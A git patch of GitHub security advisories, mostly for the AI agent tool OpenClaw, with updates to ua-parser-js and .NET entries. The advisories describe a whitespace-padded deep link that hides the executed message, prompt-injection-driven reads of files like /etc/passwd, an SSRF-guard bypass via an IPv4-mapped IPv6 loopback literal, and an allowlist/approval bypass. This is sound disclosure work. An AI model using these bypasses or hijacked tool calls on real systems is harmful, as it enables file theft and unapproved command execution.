the user clicked \"Run\".\n\nAt the time of writing, the OpenClaw macOS desktop client is still in beta.\n\nAn attacker could pad the message with whitespace to push a malicious payload outside the visible preview, increasing the chance a user approves a different message than the one that is actually executed.\n\n### Impact\nIf a user runs the deep link, the agent may perform actions that can lead to arbitrary command execution depending on the user's configured tool approvals/allowlists. This is a social-engineering mediated vulnerability: the confirmation prompt could be made to misrepresent the executed message.\n\n## Affected Versions\n- OpenClaw macOS desktop client versions >= 2026.2.6 and <= 2026.2.13.\n\n## Fixed Versions\n- 2026.2.14.\n\n### Mitigations\n- Do not approve unexpected \"Run OpenClaw agent?\" prompts triggered while browsing untrusted sites.\n- Use unattended deep links only with a valid `key` for trusted personal automations.\n\n### Resolution\nUnkeyed deep links now enforce a strict message length limit for confirmation and ignore delivery/routing knobs (`deliver`, `to`, `channel`) unless a valid unattended `key` is provided.\n\nFix commit: 28d9dd7a772501ccc3f71457b4adfee79084fe6f\n\n---\n\nFix commit 28d9dd7a772501ccc3f71457b4adfee79084fe6f confirmed on main and in v2026.2.14. Upgrade to `openclaw >= 2026.2.14`.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.2.6-0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7q2j-c4q5-rm27" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/28d9dd7a772501ccc3f71457b4adfee79084fe6f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-451" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:41:40Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json b/advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json new file mode 100644 index 0000000000000..e93320993406d --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jpq-5h99-ff5r", + "modified": "2026-02-17T21:41:52Z", + "published": "2026-02-17T21:41:52Z", + "aliases": [ + "CVE-2026-26321" + ], + "summary": "OpenClaw has a local file disclosure via sendMediaFeishu in Feishu extension", + "details": "### Summary\nThe Feishu extension previously allowed `sendMediaFeishu` to treat attacker-controlled `mediaUrl` values as local filesystem paths and read them directly.\n\n### Affected versions\n- `< 2026.2.14`\n\n### Patched versions\n- `>= 2026.2.14`\n\n### Impact\nIf an attacker can influence tool calls (directly or via prompt injection), they may be able to exfiltrate local files by supplying paths such as `/etc/passwd` as `mediaUrl`.\n\n### Remediation\nUpgrade to OpenClaw `2026.2.14` or newer.\n\n### Notes\nThe fix removes direct local file reads from this path and routes media loading through hardened helpers that enforce local-root restrictions.\n\n---\n\nFix commit 5b4121d60 confirmed on main and in v2026.2.14. Upgrade to `openclaw >= 2026.2.14`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8jpq-5h99-ff5r" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/5b4121d6011a48c71e747e3c18197f180b872c5d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:41:52Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json b/advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json new file mode 100644 index 0000000000000..51279fa50f1f1 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8mh7-phf8-xgfm", + "modified": "2026-02-17T21:43:41Z", + "published": "2026-02-17T21:43:41Z", + "aliases": [ + "CVE-2026-26326" + ], + "summary": "OpenClaw skills.status could leak secrets to operator.read clients", + "details": "### Summary\n\n`skills.status` could disclose secrets to `operator.read` clients by returning raw resolved config values in `configChecks` for skill `requires.config` paths.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `<= 2026.2.13`\n- Patched: `2026.2.14`\n\n### Details\n\nThe gateway method `skills.status` returned a requirements report that included `configChecks[].value` (the resolved value for each `requires.config` entry). If a skill required a broad config subtree (for example `channels.discord`), the report could include secrets such as Discord bot tokens.\n\n`skills.status` is callable with `operator.read`, so read-scoped clients could obtain secrets without `operator.admin` / `config.*` access.\n\n### Fix\n\n- Stop including raw resolved config values in requirement checks (return only `{ path, satisfied }`).\n- Narrow the Discord skill requirement to the token key.\n\nFix commit(s):\n\n- d3428053d95eefbe10ecf04f92218ffcba55ae5a\n- ebc68861a61067fc37f9298bded3eec9de0ba783\n\n### Mitigation\n\nRotate any Discord tokens that may have been exposed to read-scoped clients.\n\nThanks @simecek for reporting.\n\n---\n\nFix commits d3428053d95eefbe10ecf04f92218ffcba55ae5a and ebc68861a61067fc37f9298bded3eec9de0ba783 confirmed on main and in v2026.2.14. Upgrade to `openclaw >= 2026.2.14`.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8mh7-phf8-xgfm" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/d3428053d95eefbe10ecf04f92218ffcba55ae5a" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/ebc68861a61067fc37f9298bded3eec9de0ba783" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:43:41Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json b/advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json new file mode 100644 index 0000000000000..c9fac9f32c3c5 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g6q9-8fvw-f7rf", + "modified": "2026-02-17T21:42:15Z", + "published": "2026-02-17T21:42:15Z", + "aliases": [ + "CVE-2026-26322" + ], + "summary": "OpenClaw Gateway tool allowed unrestricted gatewayUrl override", + "details": "## Summary\nThe Gateway tool accepted a tool-supplied `gatewayUrl` without sufficient restrictions, which could cause the OpenClaw host to attempt outbound WebSocket connections to user-specified targets.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.13`\n- Patched versions: `>= 2026.2.14` (planned)\n\n## What Is Needed To Trigger This\nThis requires the ability to invoke tools that accept `gatewayUrl` overrides (directly or indirectly). In typical setups this is limited to authenticated operators, trusted automation, or environments where tool calls are exposed to non-operators.\n\nIn other words, this is not a drive-by issue for arbitrary internet users unless a deployment explicitly allows untrusted users to trigger these tool calls.\n\n## Details\nSome tool call paths allowed `gatewayUrl` overrides to flow into the Gateway WebSocket client without validation or allowlisting. This meant the host could be instructed to attempt connections to non-gateway endpoints (for example, localhost services, private network addresses, or cloud metadata IPs).\n\n## Impact\nIn the common case, this results in an outbound connection attempt from the OpenClaw host (and corresponding errors/timeouts). In environments where the tool caller can observe the results, this can also be used for limited network reachability probing. If the target speaks WebSocket and is reachable, further interaction may be possible.\n\n## Fix\nTool-supplied `gatewayUrl` overrides are now restricted to loopback (on the configured gateway port) or the configured `gateway.remote.url`. Disallowed protocols, credentials, query/hash, and non-root paths are rejected.\n\n## Fix Commit(s)\n- c5406e1d2434be2ef6eb4d26d8f1798d718713f4\n\n## Release Process Note\n`patched_versions` is set to the planned next release. Once the npm release is published, the advisory can be published without further edits.\n\nThanks @p80n-sec for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g6q9-8fvw-f7rf" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/c5406e1d2434be2ef6eb4d26d8f1798d718713f4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:42:15Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json b/advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json new file mode 100644 index 0000000000000..fefb15ed84ef3 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h3f9-mjwj-w476", + "modified": "2026-02-17T21:42:49Z", + "published": "2026-02-17T21:42:49Z", + "aliases": [ + "CVE-2026-26325" + ], + "summary": "OpenClaw Node host system.run rawCommand/command mismatch can bypass allowlist/approvals", + "details": "## Summary\n\nA mismatch between `rawCommand` and `command[]` in the node host `system.run` handler could cause allowlist/approval evaluation to be performed on one command while executing a different argv.\n\n## Affected Configurations\n\nThis only impacts deployments that:\n\n- Use the node host / companion node execution path (`system.run` on a node).\n- Enable allowlist-based exec policy (`security=allowlist`) with approval prompting driven by allowlist misses (for example `ask=on-miss`).\n- Allow an attacker to invoke `system.run`.\n\nDefault/non-node configurations are not affected.\n\n## Impact\n\nIn affected configurations, an attacker who can invoke `system.run` can bypass allowlist enforcement and approval prompts by supplying an allowlisted `rawCommand` while providing a different `command[]` argv for execution.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.13`\n- Patched version: `>= 2026.2.14` (planned next release)\n\n## Fix\n\nEnforce `rawCommand`/`command[]` consistency (gateway fail-fast + node host validation).\n\n## Fix Commit(s)\n\n- cb3290fca32593956638f161d9776266b90ab891\n\n## Release Process Note\n\nThis advisory pre-sets the patched version to the planned next release (`2026.2.14`). Once `openclaw@2026.2.14` is published to npm, the advisory can be published without further edits.\n\nThanks @christos-eth for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h3f9-mjwj-w476" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/cb3290fca32593956638f161d9776266b90ab891" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:42:49Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json b/advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json new file mode 100644 index 0000000000000..231805f7ddbb7 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jrvc-8ff5-2f9f", + "modified": "2026-02-17T21:42:40Z", + "published": "2026-02-17T21:42:40Z", + "aliases": [ + "CVE-2026-26324" + ], + "summary": "OpenClaw has a SSRF guard bypass via full-form IPv4-mapped IPv6 (loopback / metadata reachable)", + "details": "### Summary\n\nOpenClaw's SSRF protection could be bypassed using full-form IPv4-mapped IPv6 literals such as `0:0:0:0:0:ffff:7f00:1` (which is `127.0.0.1`). This could allow requests that should be blocked (loopback / private network / link-local metadata) to pass the SSRF guard.\n\n- Vulnerable component: SSRF guard (`src/infra/net/ssrf.ts`)\n- Issue type: SSRF protection bypass\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Vulnerable: `<= 2026.2.13`\n- Patched: `>= 2026.2.14` (planned next release)\n\n### Details\n\nThe SSRF guard's IP classification did not consistently detect private IPv4 addresses when they were embedded in IPv6 using full-form IPv4-mapped IPv6 notation. As a result, inputs like `0:0:0:0:0:ffff:7f00:1` could bypass loopback/private network blocking.\n\n### Fix Commit(s)\n\n- `c0c0e0f9aecb913e738742f73e091f2f72d39a19`\n\n### Release Process Note\n\nThis advisory is kept in draft state with the patched version set to the planned next release. Once `openclaw@2026.2.14` is published to npm, the only remaining step should be to publish this advisory.\n\nThanks @yueyueL for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jrvc-8ff5-2f9f" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/c0c0e0f9aecb913e738742f73e091f2f72d39a19" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:42:40Z", + "nvd_published_at": null + } +} \ No newline at end of file From 6234aea6b2092e63f7ada16d0f065e5be5c37a34 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 17 Feb 2026 21:50:05 +0000 Subject: [PATCH 135/215] Publish GHSA-87r5-mp6g-5w5j --- .../2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json b/advisories/github-reviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json index 5ea36ae35cac0..d08c716ee5736 100644 --- a/advisories/github-reviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json +++ b/advisories/github-reviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-87r5-mp6g-5w5j", - "modified": "2026-02-12T15:29:55Z", + "modified": "2026-02-17T21:47:32Z", "published": "2026-02-09T06:30:28Z", "aliases": [ "CVE-2026-1615" @@ -32,7 +32,7 @@ "introduced": "0" }, { - "fixed": "1.2.1" + "last_affected": "1.2.1" } ] } From d50ee2b209d100ab6e69caf88d90e2504e44338d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 17 Feb 2026 21:59:40 +0000 Subject: [PATCH 136/215] Publish GHSA-pjwm-rvh2-c87w --- .../2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json b/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json index 9ef5757001b98..b1da087ffa98d 100644 --- a/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json +++ b/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-pjwm-rvh2-c87w", - "modified": "2023-07-28T15:38:48Z", + "modified": "2026-02-17T21:57:43Z", "published": "2021-10-22T20:38:14Z", - "aliases": [], + "aliases": [ + "CVE-2021-4229" + ], "summary": "Embedded malware in ua-parser-js", "details": "The npm package `ua-parser-js` had three versions published with malicious code. Users of affected versions (0.7.29, 0.8.0, 1.0.0) should upgrade as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/faisalman/ua-parser-js/issues/536) for details as they unfold.\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": [ From 18bef7ecc40f3f39b880f385b2c36992b92bf5c2 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 17 Feb 2026 22:03:13 +0000 Subject: [PATCH 137/215] Publish Advisories GHSA-g74q-5xw3-j7q9 GHSA-c2f9-4jmm-v45m GHSA-2cgv-28vr-rv6j --- .../GHSA-g74q-5xw3-j7q9.json | 15 ++++-- .../GHSA-c2f9-4jmm-v45m.json | 15 ++++-- .../GHSA-2cgv-28vr-rv6j.json | 46 ++++++++++++++++++- 3 files changed, 66 insertions(+), 10 deletions(-) diff --git a/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json b/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json index 3ef93a9f6af83..5f7a7b4f87119 100644 --- a/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json +++ b/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-g74q-5xw3-j7q9", - "modified": "2024-03-19T18:00:01Z", + "modified": "2026-02-17T22:01:33Z", "published": "2024-02-13T19:49:43Z", "aliases": [ "CVE-2024-21386" ], "summary": "Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability", "details": "# Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in ASP.NET 6.0, ASP.NET 7.0 and, ASP.NET 8.0 . This advisory also provides guidance on what developers can do to update their applications to address this vulnerability.\n\nA vulnerability exists in ASP.NET applications using SignalR where a malicious client can result in a denial-of-service.\n\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/295\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 6.0 application running on .NET 6.0.26 or earlier.\n* Any .NET 7.0 application running on .NET 7.0.15 or earlier.\n* Any .NET 8.0 application running on .NET 8.0.1 or earlier.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET Core project if it uses any of affected packages versions listed below\n\n### ASP.NET 6.0\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 6.0.26 | 6.0.27\n\n\n\n### ASP.NET 7.0\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 7.0.15 | 7.0.16\n\n### ASP.NET 8.0\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages) , you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 8.0 or .NET 7.0 or .NET 6.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 6.0.200\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 6.0.5\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 6.0.200 [C:\\Program Files\\dotnet\\sdk]\n\n.NET Core runtimes installed:\n\n Microsoft.AspNetCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.AspNetCore.App]\n Microsoft.NETCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App]\n 